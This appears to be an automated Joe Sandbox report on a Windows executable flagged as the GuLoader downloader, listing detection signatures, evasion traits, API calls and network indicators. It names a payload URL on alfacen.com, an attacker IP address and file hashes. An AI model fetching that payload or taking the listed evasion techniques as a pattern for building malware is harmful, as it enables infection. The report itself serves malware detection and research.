Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3507071243740008011.exe

Overview

General Information

Sample name:3507071243740008011.exe
Analysis ID:1538168
MD5:300ffb3fd65eb4a84a14802828f91e38
SHA1:937574595a8e68f7a77b95a7f99b530007f9fc5c
SHA256:24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3507071243740008011.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
    • 3507071243740008011.exe (PID: 7984 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2445417513.0000000005438000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: 3507071243740008011.exeAvira: detected
    Multi AV Scanner detection for submitted file
    Source: 3507071243740008011.exeReversingLabs: Detection: 31%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: 3507071243740008011.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49839 version: TLS 1.2
    Source: 3507071243740008011.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 3507071243740008011.exe, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727268386.00000000369C6000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2729820928.0000000036B7C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: alfacen.comCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: alfacen.com
    Source: 3507071243740008011.exe, 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000000.1654398706.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000004.00000000.2441682476.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 3507071243740008011.exe, 00000004.00000003.2727628175.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767646001.0000000006B34000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000003.2727893517.0000000006B43000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2767716944.0000000006B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
    Source: 3507071243740008011.exe, 00000004.00000002.2767646001.0000000006B34000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000004.00000002.2791020426.0000000036160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.bin
    Source: 3507071243740008011.exe, 00000004.00000001.2443890580.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownHTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49839 version: TLS 1.2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA35C0 NtCreateMutant,LdrInitializeThunk,4_2_36DA35C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_36DA2DF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA3090 NtSetValueKey,4_2_36DA3090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA3010 NtOpenDirectoryObject,4_2_36DA3010
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA3D70 NtOpenThread,4_2_36DA3D70
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA3D10 NtOpenProcessToken,4_2_36DA3D10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA39B0 NtGetContextThread,4_2_36DA39B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA4650 NtSuspendThread,4_2_36DA4650
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA4340 NtSetContextThread,4_2_36DA4340
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2EE0 NtQueueApcThread,4_2_36DA2EE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2E80 NtReadVirtualMemory,4_2_36DA2E80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2EA0 NtAdjustPrivilegesToken,4_2_36DA2EA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2E30 NtWriteVirtualMemory,4_2_36DA2E30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2FE0 NtCreateFile,4_2_36DA2FE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2F90 NtProtectVirtualMemory,4_2_36DA2F90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2FB0 NtResumeThread,4_2_36DA2FB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2FA0 NtQuerySection,4_2_36DA2FA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2F60 NtCreateProcessEx,4_2_36DA2F60
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2F30 NtCreateSection,4_2_36DA2F30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2CC0 NtQueryVirtualMemory,4_2_36DA2CC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2CF0 NtOpenProcess,4_2_36DA2CF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2CA0 NtQueryInformationToken,4_2_36DA2CA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2C70 NtFreeVirtualMemory,4_2_36DA2C70
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2C60 NtCreateKey,4_2_36DA2C60
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2C00 NtQueryInformationProcess,4_2_36DA2C00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2DD0 NtDelayExecution,4_2_36DA2DD0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2DB0 NtEnumerateKey,4_2_36DA2DB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2D10 NtMapViewOfSection,4_2_36DA2D10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2D00 NtSetInformationFile,4_2_36DA2D00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2D30 NtUnmapViewOfSection,4_2_36DA2D30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2AD0 NtReadFile,4_2_36DA2AD0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2AF0 NtWriteFile,4_2_36DA2AF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2AB0 NtWaitForSingleObject,4_2_36DA2AB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2BF0 NtAllocateVirtualMemory,4_2_36DA2BF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2BE0 NtQueryValueKey,4_2_36DA2BE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2B80 NtQueryInformationFile,4_2_36DA2B80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2BA0 NtEnumerateValueKey,4_2_36DA2BA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA2B60 NtClose,4_2_36DA2B60
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00404C620_2_00404C62
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00406ADD0_2_00406ADD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004072B40_2_004072B4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E216CC4_2_36E216CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB56304_2_36DB5630
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2F7B04_2_36E2F7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D614604_2_36D61460
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2F43F4_2_36E2F43F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E395C34_2_36E395C3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0D5B04_2_36E0D5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E275714_2_36E27571
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C04_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D2F04_2_36D8D2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A04_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB739A4_2_36DB739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D34C4_2_36D5D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2132D4_2_36E2132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2F0E04_2_36E2F0E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E270E94_2_36E270E9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C04_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F0CC4_2_36E1F0CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7B1B04_2_36D7B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3B16B4_2_36E3B16B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F1724_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA516C4_2_36DA516C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D79EB04_2_36D79EB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D33FD24_2_36D33FD2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D33FD54_2_36D33FD5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71F924_2_36D71F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2FFB14_2_36E2FFB1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2FF094_2_36E2FF09
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2FCF24_2_36E2FCF2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE9C324_2_36DE9C32
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8FDC04_2_36D8FDC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E27D734_2_36E27D73
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D73D404_2_36D73D40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E21D5A4_2_36E21D5A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1DAC64_2_36E1DAC6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E11AA34_2_36E11AA3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0DAAC4_2_36E0DAAC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB5AA04_2_36DB5AA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E27A464_2_36E27A46
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2FA494_2_36E2FA49
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE3A6C4_2_36DE3A6C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DADBF94_2_36DADBF9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE5BF04_2_36DE5BF0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8FB804_2_36D8FB80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2FB764_2_36E2FB76
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D738E04_2_36D738E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD8004_2_36DDD800
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D799504_2_36D79950
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B9504_2_36D8B950
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E059104_2_36E05910
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8C6E04_2_36D8C6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6C7C04_2_36D6C7C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D947504_2_36D94750
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D707704_2_36D70770
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1E4F64_2_36E1E4F6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E224464_2_36E22446
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E144204_2_36E14420
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E305914_2_36E30591
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D705354_2_36D70535
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF02C04_2_36DF02C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E102744_2_36E10274
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E303E64_2_36E303E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7E3F04_2_36D7E3F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2A3524_2_36E2A352
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E020004_2_36E02000
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E281CC4_2_36E281CC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E241A24_2_36E241A2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E301AA4_2_36E301AA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF81584_2_36DF8158
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D601004_2_36D60100
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0A1184_2_36E0A118
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2EEDB4_2_36E2EEDB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D82E904_2_36D82E90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2CE934_2_36E2CE93
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D70E594_2_36D70E59
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2EE264_2_36E2EE26
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D62FC84_2_36D62FC8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7CFE04_2_36D7CFE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DEEFA04_2_36DEEFA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE4F404_2_36DE4F40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E12F304_2_36E12F30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D90F304_2_36D90F30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB2F284_2_36DB2F28
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D60CF24_2_36D60CF2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E10CB54_2_36E10CB5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D70C004_2_36D70C00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6ADE04_2_36D6ADE0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D88DBF4_2_36D88DBF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7AD004_2_36D7AD00
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0CD1F4_2_36E0CD1F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D6EA804_2_36D6EA80
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E26BD74_2_36E26BD7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2AB404_2_36E2AB40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9E8F04_2_36D9E8F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D568B84_2_36D568B8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D728404_2_36D72840
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7A8404_2_36D7A840
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3A9A64_2_36E3A9A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D729A04_2_36D729A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D869624_2_36D86962
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36D5B970 appears 262 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DDEA12 appears 86 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DA5130 appears 58 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DEF290 appears 105 times
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: String function: 36DB7E54 appears 108 times
    Source: 3507071243740008011.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 3507071243740008011.exe, 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: 3507071243740008011.exe, 00000004.00000003.2727268386.0000000036AE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: 3507071243740008011.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile created: C:\Users\user\AppData\Roaming\pechayJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile created: C:\Users\user\AppData\Local\Temp\nslD521.tmpJump to behavior
    Source: 3507071243740008011.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 3507071243740008011.exeReversingLabs: Detection: 31%
    Source: C:\Users\user\Desktop\3507071243740008011.exeFile read: C:\Users\user\Desktop\3507071243740008011.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exeProcess created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\3507071243740008011.exeSection loaded: msls31.dllJump to behavior
